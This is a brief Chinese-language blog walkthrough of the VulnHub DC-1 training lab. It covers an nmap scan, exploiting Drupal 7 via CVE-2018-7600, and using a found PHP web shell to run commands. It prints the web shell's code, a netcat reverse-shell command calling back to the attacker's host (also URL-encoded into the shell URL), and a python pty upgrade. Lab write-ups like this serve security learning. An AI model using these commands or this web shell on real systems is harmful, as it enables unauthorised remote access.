VulnHub-DC1
尋找DC-1靶機
$ nmap 10.0.2.4 -A -p-
發現有port 80 -> 直接瀏覽網頁
使用wappalyzer得知使用Drupal 7
搜尋已知Exploit來取得RCE
- CVE-2018-7600
ls -> 發現flag1
發現有shell.php
<?php if( isset( $_REQUEST['c'])) { system( $_REQUEST['c'] . ' 2>&1 ');}>
使用nc 監聽取回reverse shell(python pty)
http://10.0.2.4/shell.php?c=nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080
python -c "import pty;pty.spawn('/bin/bash')"
本部落格所有文章除特別聲明外,均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog | 技術分享!